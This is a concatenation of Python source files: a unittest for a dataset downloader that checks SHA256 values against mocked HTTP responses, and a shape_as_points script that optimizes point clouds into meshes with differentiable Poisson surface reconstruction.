    print (f" mAA total = {final_mAA:.5f}")
    save_h5({"mAA": final_mAA}, out_maa_final_fname)
    print ('Done!')
|
<filename>tests/zookeeper/test_download_center.py
import hashlib
import io
import json
import os
import responses
import sys
import unittest
import zipfile
from data_mine import Collection
from data_mine.utils import datamine_cache_dir
from data_mine.zookeeper import download_dataset
from pyfakefs.fake_filesystem_unittest import TestCase
if sys.version_info >= (3, 3):
from unittest.mock import patch
else:
from mock import patch
class TestDownloadDatasetFn(TestCase):
    """Tests for data_mine.zookeeper.download_dataset.

    Uses pyfakefs for an in-memory filesystem and `responses` to mock HTTP,
    so no real network or disk access happens.
    """

    def setUp(self):
        self.setUpPyfakefs()
        self.FAKE_DATASET = Collection.RACE
        self.FAKE_URL_DATA1 = self.fake_url_data()          # a zip archive
        self.FAKE_URL_DATA2 = b"This is a JSON file."       # a plain file
        # Config with two download requirements whose SHA256 values match the
        # fake payloads above.
        self.FAKE_CONFIG = {
            self.FAKE_DATASET.name: json.loads("""{{
                "requirements": [
                    {{
                        "URL": "http://fake-website.com/my/files.zip",
                        "SHA256": "{0}"
                    }},
                    {{
                        "URL": "http://fake-website.com/my2/file.json",
                        "SHA256": "{1}"
                    }}
                ]
            }}""".format(
                self.bytes_sha256(self.FAKE_URL_DATA1),
                self.bytes_sha256(self.FAKE_URL_DATA2)
            ))
        }  # We use double braces so as to force `format` ignore them.

    # Returns a bytestream with the contents of the fake URL (zip archive).
    def fake_url_data(self):
        all_files = [
            ("1.txt", io.BytesIO(b"First question")),
            ("2.txt", io.BytesIO(b"Second question")),
            ("dir/3.txt", io.BytesIO(b"Third question"))
        ]
        zip_buffer = io.BytesIO()
        with zipfile.ZipFile(zip_buffer, "a") as zip_file:
            for file_name, data in all_files:
                zip_file.writestr(file_name, data.getvalue())
        return zip_buffer.getvalue()

    # Computes the SHA256 of a bytestream and returns the value in hex.
    def bytes_sha256(self, bytestream):
        sha256 = hashlib.sha256()
        sha256.update(bytestream)
        return sha256.hexdigest()

    @patch('data_mine.zookeeper.download_center.load_datasets_config')
    def test_dataset_not_downloaded_if_locally_available(self, mock_fn):
        # When the integrity check passes, no config is loaded and nothing is
        # downloaded (return code 1 — presumably "already available"; confirm
        # against download_dataset's contract).
        def fake_integrity_check(dataset_id):
            self.assertEqual(dataset_id, Collection.RACE)
            return True
        return_code = download_dataset(Collection.RACE, fake_integrity_check)
        mock_fn.assert_not_called()
        self.assertEqual(return_code, 1)

    @responses.activate
    @patch('data_mine.zookeeper.download_center.load_datasets_config')
    def test_dataset_is_downloaded_if_missing(self, mock_config):
        # Failing integrity check triggers a download of both requirements;
        # the zip is extracted and the plain file saved in the cache dir.
        mock_config.return_value = self.FAKE_CONFIG
        responses.add(responses.GET, "http://fake-website.com/my/files.zip",
                      body=self.FAKE_URL_DATA1, status=200,
                      headers={'content-length': str(len(self.FAKE_URL_DATA1))},  # noqa: E501
                      stream=True)
        responses.add(responses.GET, "http://fake-website.com/my2/file.json",
                      body=self.FAKE_URL_DATA2, status=200,
                      headers={'content-length': str(len(self.FAKE_URL_DATA2))},  # noqa: E501
                      stream=True)
        return_code = download_dataset(Collection.RACE, lambda _: False)
        self.assertEqual(return_code, 2)
        data_dir = os.path.join(datamine_cache_dir(), self.FAKE_DATASET.name)
        self.assertEqual(
            open(os.path.join(data_dir, "1.txt"), "rt").read(),
            "First question"
        )
        self.assertEqual(
            open(os.path.join(data_dir, "2.txt"), "rt").read(),
            "Second question"
        )
        self.assertEqual(
            open(os.path.join(data_dir, "dir/3.txt"), "rt").read(),
            "Third question"
        )
        self.assertEqual(
            open(os.path.join(data_dir, "file.json"), "rt").read(),
            "This is a JSON file."
        )

    @responses.activate
    @patch('data_mine.zookeeper.download_center.load_datasets_config')
    def test_exception_raised_if_url_not_reachable(self, mock_config):
        # We also check that the dataset directory is not created if existing.
        os.makedirs(
            os.path.join(datamine_cache_dir(), self.FAKE_DATASET.name),
            mode=0o755
        )
        mock_config.return_value = self.FAKE_CONFIG
        # No `responses` registrations: any HTTP request fails and the
        # download is expected to raise.
        with self.assertRaises(Exception):
            download_dataset(Collection.RACE, lambda _: False)
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
|
<reponame>raphaelsulzer/shape_as_points
import torch
import trimesh
import shutil, argparse, time, os, glob
import numpy as np; np.set_printoptions(precision=4)
import open3d as o3d
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import save_image
from torchvision.io import write_video
from src.optimization import Trainer
from src.utils import load_config, update_config, initialize_logger, \
get_learning_rate_schedules, adjust_learning_rate, AverageMeter,\
update_optimizer, export_pointcloud
from skimage import measure
from plyfile import PlyData
from pytorch3d.ops import sample_points_from_meshes
from pytorch3d.io import load_objs_as_meshes
from pytorch3d.structures import Meshes
def main():
parser = argparse.ArgumentParser(description='MNIST toy experiment')
parser.add_argument('config', type=str, help='Path to config file.')
parser.add_argument('--no_cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1457, metavar='S',
help='random seed')
args, unknown = parser.parse_known_args()
cfg = load_config(args.config, 'configs/default.yaml')
cfg = update_config(cfg, unknown)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
data_type = cfg['data']['data_type']
data_class = cfg['data']['class']
print(cfg['train']['out_dir'])
# PYTORCH VERSION > 1.0.0
assert(float(torch.__version__.split('.')[-3]) > 0)
# boiler-plate
if cfg['train']['timestamp']:
cfg['train']['out_dir'] += '_' + time.strftime("%Y_%m_%d_%H_%M_%S")
logger = initialize_logger(cfg)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
shutil.copyfile(args.config,
os.path.join(cfg['train']['out_dir'], 'config.yaml'))
# tensorboardX writer
tblogdir = os.path.join(cfg['train']['out_dir'], "tensorboard_log")
if not os.path.exists(tblogdir):
os.makedirs(tblogdir)
writer = SummaryWriter(log_dir=tblogdir)
# initialize o3d visualizer
vis = None
if cfg['train']['o3d_show']:
vis = o3d.visualization.Visualizer()
vis.create_window(width=cfg['train']['o3d_window_size'],
height=cfg['train']['o3d_window_size'])
# initialize dataset
if data_type == 'point':
if cfg['data']['object_id'] != -1:
data_paths = sorted(glob.glob(cfg['data']['data_path']))
data_path = data_paths[cfg['data']['object_id']]
print('Loaded %d/%d object' % (cfg['data']['object_id']+1, len(data_paths)))
else:
data_path = cfg['data']['data_path']
print('Data loaded')
ext = data_path.split('.')[-1]
if ext == 'obj': # have GT mesh
mesh = load_objs_as_meshes([data_path], device=device)
# scale the mesh into unit cube
verts = mesh.verts_packed()
N = verts.shape[0]
center = verts.mean(0)
mesh.offset_verts_(-center.expand(N, 3))
scale = max((verts - center).abs().max(0)[0])
mesh.scale_verts_((1.0 / float(scale)))
# important for our DPSR to have the range in [0, 1), not reaching 1
mesh.scale_verts_(0.9)
target_pts, target_normals = sample_points_from_meshes(mesh,
num_samples=200000, return_normals=True)
elif ext == 'ply': # only have the point cloud
plydata = PlyData.read(data_path)
vertices = np.stack([plydata['vertex']['x'],
plydata['vertex']['y'],
plydata['vertex']['z']], axis=1)
normals = np.stack([plydata['vertex']['nx'],
plydata['vertex']['ny'],
plydata['vertex']['nz']], axis=1)
N = vertices.shape[0]
center = vertices.mean(0)
scale = np.max(np.max(np.abs(vertices - center), axis=0))
vertices -= center
vertices /= scale
vertices *= 0.9
target_pts = torch.tensor(vertices, device=device)[None].float()
target_normals = torch.tensor(normals, device=device)[None].float()
mesh = None # no GT mesh
if not torch.is_tensor(center):
center = torch.from_numpy(center)
if not torch.is_tensor(scale):
scale = torch.from_numpy(np.array([scale]))
data = {'target_points': target_pts,
'target_normals': target_normals, # normals are never used
'gt_mesh': mesh}
else:
raise NotImplementedError
# save the input point cloud
if 'target_points' in data.keys():
outdir_pcl = os.path.join(cfg['train']['out_dir'], 'target_pcl.ply')
if 'target_normals' in data.keys():
export_pointcloud(outdir_pcl, data['target_points'], data['target_normals'])
else:
export_pointcloud(outdir_pcl, data['target_points'])
# save oracle PSR mesh (mesh from our PSR using GT point+normals)
if data.get('gt_mesh') is not None:
gt_verts, gt_faces = data['gt_mesh'].get_mesh_verts_faces(0)
pts_gt, norms_gt = sample_points_from_meshes(data['gt_mesh'],
num_samples=500000, return_normals=True)
pts_gt = (pts_gt + 1) / 2
from src.dpsr import DPSR
dpsr_tmp = DPSR(res=(cfg['model']['grid_res'],
cfg['model']['grid_res'],
cfg['model']['grid_res']),
sig=cfg['model']['psr_sigma']).to(device)
target = dpsr_tmp(pts_gt, norms_gt).unsqueeze(1).to(device)
target = torch.tanh(target)
s = target.shape[-1] # size of psr_grid
psr_grid_numpy = target.squeeze().detach().cpu().numpy()
verts, faces, _, _ = measure.marching_cubes(psr_grid_numpy)
verts = verts / s * 2. - 1 # [-1, 1]
mesh = o3d.geometry.TriangleMesh()
mesh.vertices = o3d.utility.Vector3dVector(verts)
mesh.triangles = o3d.utility.Vector3iVector(faces)
outdir_mesh = os.path.join(cfg['train']['out_dir'], 'oracle_mesh.ply')
o3d.io.write_triangle_mesh(outdir_mesh, mesh)
# initialize the source point cloud given an input mesh
if 'input_mesh' in cfg['train'].keys() and \
os.path.isfile(cfg['train']['input_mesh']):
if cfg['train']['input_mesh'].split('/')[-2] == 'mesh':
mesh_tmp = trimesh.load_mesh(cfg['train']['input_mesh'])
verts = torch.from_numpy(mesh_tmp.vertices[None]).float().to(device)
faces = torch.from_numpy(mesh_tmp.faces[None]).to(device)
mesh = Meshes(verts=verts, faces=faces)
points, normals = sample_points_from_meshes(mesh,
num_samples=cfg['data']['num_points'], return_normals=True)
# mesh is saved in the original scale of the gt
points -= center.float().to(device)
points /= scale.float().to(device)
points *= 0.9
# make sure the points are within the range of [0, 1)
points = points / 2. + 0.5
else:
# directly initialize from a point cloud
pcd = o3d.io.read_point_cloud(cfg['train']['input_mesh'])
points = torch.from_numpy(np.array(pcd.points)[None]).float().to(device)
normals = torch.from_numpy(np.array(pcd.normals)[None]).float().to(device)
points -= center.float().to(device)
points /= scale.float().to(device)
points *= 0.9
points = points / 2. + 0.5
else: #! initialize our source point cloud from a sphere
sphere_radius = cfg['model']['sphere_radius']
sphere_mesh = trimesh.creation.uv_sphere(radius=sphere_radius,
count=[256,256])
points, idx = sphere_mesh.sample(cfg['data']['num_points'],
return_index=True)
points += 0.5 # make sure the points are within the range of [0, 1)
normals = sphere_mesh.face_normals[idx]
points = torch.from_numpy(points).unsqueeze(0).to(device)
normals = torch.from_numpy(normals).unsqueeze(0).to(device)
points = torch.log(points/(1-points)) # inverse sigmoid
inputs = torch.cat([points, normals], axis=-1).float()
inputs.requires_grad = True
model = None # no network
# initialize optimizer
cfg['train']['schedule']['pcl']['initial'] = cfg['train']['lr_pcl']
print('Initial learning rate:', cfg['train']['schedule']['pcl']['initial'])
if 'schedule' in cfg['train']:
lr_schedules = get_learning_rate_schedules(cfg['train']['schedule'])
else:
lr_schedules = None
optimizer = update_optimizer(inputs, cfg,
epoch=0, model=model, schedule=lr_schedules)
try:
# load model
state_dict = torch.load(os.path.join(cfg['train']['out_dir'], 'model.pt'))
if ('pcl' in state_dict.keys()) & (state_dict['pcl'] is not None):
inputs = state_dict['pcl'].to(device)
inputs.requires_grad = True
optimizer = update_optimizer(inputs, cfg,
epoch=state_dict.get('epoch'), schedule=lr_schedules)
out = "Load model from epoch %d" % state_dict.get('epoch', 0)
print(out)
logger.info(out)
except:
state_dict = dict()
start_epoch = state_dict.get('epoch', -1)
trainer = Trainer(cfg, optimizer, device=device)
runtime = {}
runtime['all'] = AverageMeter()
# training loop
for epoch in range(start_epoch+1, cfg['train']['total_epochs']+1):
# schedule the learning rate
if (epoch>0) & (lr_schedules is not None):
if (epoch % lr_schedules[0].interval == 0):
adjust_learning_rate(lr_schedules, optimizer, epoch)
if len(lr_schedules) >1:
print('[epoch {}] net_lr: {}, pcl_lr: {}'.format(epoch,
lr_schedules[0].get_learning_rate(epoch),
lr_schedules[1].get_learning_rate(epoch)))
else:
print('[epoch {}] adjust pcl_lr to: {}'.format(epoch,
lr_schedules[0].get_learning_rate(epoch)))
start = time.time()
loss, loss_each = trainer.train_step(data, inputs, model, epoch)
runtime['all'].update(time.time() - start)
if epoch % cfg['train']['print_every'] == 0:
log_text = ('[Epoch %02d] loss=%.5f') %(epoch, loss)
if loss_each is not None:
for k, l in loss_each.items():
if l.item() != 0.:
log_text += (' loss_%s=%.5f') % (k, l.item())
log_text += (' time=%.3f / %.3f') % (runtime['all'].val,
runtime['all'].sum)
logger.info(log_text)
print(log_text)
# visualize point clouds and meshes
if (epoch % cfg['train']['visualize_every'] == 0) & (vis is not None):
trainer.visualize(data, inputs, model, epoch, o3d_vis=vis)
# save outputs
if epoch % cfg['train']['save_every'] == 0:
trainer.save_mesh_pointclouds(inputs, epoch,
center.cpu().numpy(),
scale.cpu().numpy()*(1/0.9))
# save checkpoints
if (epoch > 0) & (epoch % cfg['train']['checkpoint_every'] == 0):
state = {'epoch': epoch}
pcl = None
if isinstance(inputs, torch.Tensor):
state['pcl'] = inputs.detach().cpu()
torch.save(state, os.path.join(cfg['train']['dir_model'],
'%04d' % epoch + '.pt'))
print("Save new model at epoch %d" % epoch)
logger.info("Save new model at epoch %d" % epoch)
torch.save(state, os.path.join(cfg['train']['out_dir'], 'model.pt'))
# resample and gradually add new points to the source pcl
if (epoch > 0) & \
(cfg['train']['resample_every']!=0) & \
(epoch % cfg['train']['resample_every'] == 0) & \
(epoch < cfg['train']['total_epochs']):
inputs = trainer.point_resampling(inputs)
optimizer = update_optimizer(inputs, cfg,
epoch=epoch, model=model, schedule=lr_schedules)
trainer = Trainer(cfg, optimizer, device=device)
# visualize the Open3D outputs
if cfg['train']['o3d_show']:
out_video_dir = os.path.join(cfg['train']['out_dir'],
'vis/o3d/video.mp4')
if os.path.isfile(out_video_dir):
os.system('rm {}'.format(out_video_dir))
os.system('ffmpeg -framerate 30 \
-start_number 0 \
-i {}/vis/o3d/%04d.jpg \
-pix_fmt yuv420p \
-crf 17 {}'.format(cfg['train']['out_dir'], out_video_dir))
out_video_dir = os.path.join(cfg['train']['out_dir'],
'vis/o3d/video_pcd.mp4')
if os.path.isfile(out_video_dir):
os.system('rm {}'.format(out_video_dir))
os.system('ffmpeg -framerate 30 \
-start_number 0 \
-i {}/vis/o3d/%04d_pcd.jpg \
-pix_fmt yuv420p \
-crf 17 {}'.format(cfg['train']['out_dir'], out_video_dir))
print('Video saved.')
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.